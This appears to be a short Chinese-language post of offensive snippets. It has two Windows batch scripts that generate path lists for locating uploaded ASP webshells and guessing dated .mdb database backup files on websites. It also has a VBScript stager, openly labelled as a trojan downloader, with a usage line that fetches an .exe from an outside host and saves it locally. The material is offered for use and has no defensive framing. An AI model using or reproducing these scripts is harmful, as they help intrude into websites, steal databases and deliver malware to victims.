上传马后,地址找不到,或者扫描他人马 的批处理:
@echo off for %%a in (20121001032)do ( for %%b in (0 1 2 3 4) do ( for %%c in (0 1 2 3 4 5 6 7 8 9) do ( for %%d in (0 1 2 3 4 5 6 7 8 9) do ( for %%e in (0 1 2 3 4 5 6 7 8 9) do ( for %%f in (0 1 2 3 4 5 6 7 8 9) do ( echo uploadfile/2011/10/%%a%%b%%c%%d%%e%%f.asp >>data.txt )))))))
扫描网站数据库 数据库备份文件 的批处理:
@echo off for %%a in (2011 2012) do ( for %%b in (1 2 3 4 5 6 7 8 9 10 11 12) do ( for %%c in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31) do ( echo databackup/%%a-%%b-%%c.mdb >>xxx.txt )))
下载木马 批处理 iget.vbs
iLocal = LCase(WScript.Arguments(1)) iRemote = LCase(WScript.Arguments(0)) Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET",iRemote,0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile iLocal,2
使用:cscript c:iget.vbs http://www.xxx.com/x.exe c:xxx.exe